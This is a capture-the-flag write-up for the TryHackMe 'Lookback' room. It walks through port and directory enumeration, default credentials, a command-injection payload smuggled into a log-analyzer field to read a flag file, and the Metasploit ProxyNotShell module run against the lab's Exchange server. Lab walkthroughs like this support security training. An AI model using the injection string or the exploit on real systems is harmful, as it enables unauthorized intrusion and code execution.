Lookback | TryHackMe Writeups
LOOKBACK
You’ve been asked to run a vulnerability test on a production environment.
Challenge Link: LOOKBACK
The Lookback company has just started the integration with Active
Directory. Due to the coming deadline, the system integrator had to rush
the deployment of the environment. Can you spot any vulnerabilities?
Start the Virtual Machine by pressing the Start Machine button at the top of this task. You may access the VM using the AttackBox or your VPN connection. This machine does not respond to ping (ICMP).
Can you find all the flags?
The VM takes about 5 minutes to fully boot up.
Sometimes to move forward, we have to go backward.
So if you get stuck, try to look back!
The TryHackMe LOOKBACK Room is recently created CTF type challenge, which is a Windows machine where we have to crack through the machine using RDP protocol.
First Flag:
Enumeration:
As usual, starting the first step by performing the nmap or rustscan…
nmap -sS -sV 10.10.26.175
The scan shows that the machine has three running services, with port 80,443 and 3389. The machine with port 443 hosts an Outlook service.
Using Gobuster:
using the command
gobuster dir -k -u https://10.10.26.175 -w /usr/share/wordlists/dirb/big.txt --exclude-length 0
Going through all the directory I found the “/test” directory with restricted access, asking for user name and password.
Playing around with Nikto tool gives us the default user credentials. Using the credentials to access the restricted page.
Voila i got the first flag of the challenge.
Second flag:
Payload Injection:
Got this Log Analyzer window to scatter through the machine and inject commands.
After trying all the possible injections and finally found the right pay load to list the directories.
Wandering through the file i finally found the user flag.
PAYLOAD:BitlockerActiveMonitoringLogs') ; type c:\Users\dev\Desktop\user.txt #('
Final Flag:
Going through the TODO.txt file
List generated at 3:00:53 PM. Hey dev team, This is the tasks list for the deadline: Promote Server to Domain Controller [DONE] Setup Microsoft Exchange [DONE] Setup IIS [DONE] Use the latest update [KB OCT 2022 is missing need reboot] Remove the log analyzer[TO BE DONE] Add all the users from the infra department [TO BE DONE] Setup LAPS [TO BE DONE] When you are done with the tasks please send an email to: joe@thm.local carol@thm.local and do not forget to put in CC the infra team! dev-infrastracture-team@thm.local
I found that the Microsoft exchange server is outdated, and found a exploit "ProxyNotShell RCE".
Microsoft Exchange ProxyNotShell RCE:
This module chains two vulnerabilities on Microsoft Exchange Server
that, when combined, allow an authenticated attacker to interact with
the Exchange Powershell backend (CVE-2022-41040), where a
deserialization flaw can be leveraged to obtain code execution
(CVE-2022-41082). This exploit only support Exchange Server 2019.
These vulnerabilities were patched in November 2022.
Module Options
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/windows/http/exchange_proxynotshell_rce
msf exploit(exchange_proxynotshell_rce) > show targets
...targets...
msf exploit(exchange_proxynotshell_rce) > set TARGET < target-id >
msf exploit(exchange_proxynotshell_rce) > show options
...show and set options...
msf exploit(exchange_proxynotshell_rce) > exploit 
Filling the requirements with the exploit, I used the email-id provided in the TODO.txt file. And running the exploit got me the meterpreter session;
Roaming around the directories and i got the root flag.
Thank-you for reading the write-up, Have a good day...
Comments
Post a Comment